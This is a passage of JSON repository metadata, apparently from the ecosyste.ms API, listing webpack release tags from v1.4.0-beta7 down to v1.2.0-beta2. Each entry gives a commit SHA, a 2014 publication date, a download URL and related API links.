pack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/host